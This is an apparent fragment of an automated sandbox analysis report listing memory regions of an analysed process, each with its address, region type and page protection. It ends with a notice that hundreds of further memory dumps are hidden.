|
page read and write
|
||
464000
|
unkown image
|
page read and write
|
||
2DA6000
|
unkown
|
page read and write
|
||
240000
|
unkown
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
3080000
|
unkown
|
page read and write
|
||
F0000
|
unkown
|
page readonly
|
||
2880000
|
unkown
|
page readonly
|
||
1C4000
|
heap private
|
page read and write
|
||
2A2D000
|
stack
|
page read and write
|
||
1DC000
|
unkown
|
page read and write
|
||
530000
|
unkown
|
page readonly
|
||
377000
|
heap default
|
page read and write
|
||
7A0000
|
unkown
|
page readonly
|
||
28A0000
|
unkown
|
page write copy
|
||
33F4000
|
unkown
|
page read and write
|
||
1B314000
|
unkown
|
page read and write
|
||
1BA4E000
|
unkown
|
page read and write
|
||
A84000
|
heap private
|
page read and write
|
||
2EE0000
|
unkown
|
page read and write
|
||
2DD0000
|
unkown
|
page write copy
|
||
970000
|
heap private
|
page read and write
|
||
970000
|
heap private
|
page read and write
|
||
26D0000
|
unkown
|
page read and write
|
||
29E0000
|
unkown
|
page read and write
|
||
220D000
|
unkown
|
page read and write
|
||
347000
|
heap default
|
page read and write
|
||
5E0000
|
heap default
|
page read and write
|
||
2E6C000
|
unkown
|
page read and write
|
||
1AB000
|
unkown
|
page read and write
|
||
334000
|
heap default
|
page read and write
|
||
1D4000
|
unkown image
|
page read and write
|
||
D0000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
282E000
|
stack
|
page read and write
|
||
2FFE000
|
stack
|
page read and write
|
||
2EFE000
|
stack
|
page read and write
|
||
12C41000
|
unkown
|
page read and write
|
||
2E40000
|
unkown
|
page read and write
|
||
360000
|
unkown
|
page read and write
|
||
39F000
|
heap default
|
page read and write
|
||
3484000
|
unkown
|
page read and write
|
||
1F40000
|
unkown
|
page readonly
|
||
7FF001C0000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
E0000
|
unkown
|
page readonly
|
||
2B31000
|
unkown
|
page read and write
|
||
AA0000
|
heap private
|
page read and write
|
||
A40000
|
heap private
|
page read and write
|
||
421000
|
unkown image
|
page execute and read and write
|
||
1B50000
|
unkown
|
page readonly
|
||
731000
|
unkown image
|
page execute and read and write
|
||
1A0000
|
heap private
|
page read and write
|
||
7FF001A0000
|
unkown
|
page read and write
|
||
7FF00032000
|
unkown
|
page execute and read and write
|
||
EC000
|
stack
|
page read and write
|
||
4C7000
|
heap default
|
page read and write
|
||
7FF00240000
|
unkown
|
page execute and read and write
|
||
2A0F000
|
unkown
|
page read and write
|
||
2E0000
|
unkown
|
page read and write
|
||
9E0000
|
heap private
|
page read and write
|
||
2830000
|
heap private
|
page execute and read and write
|
There are 825 hidden memdumps, click here to show them.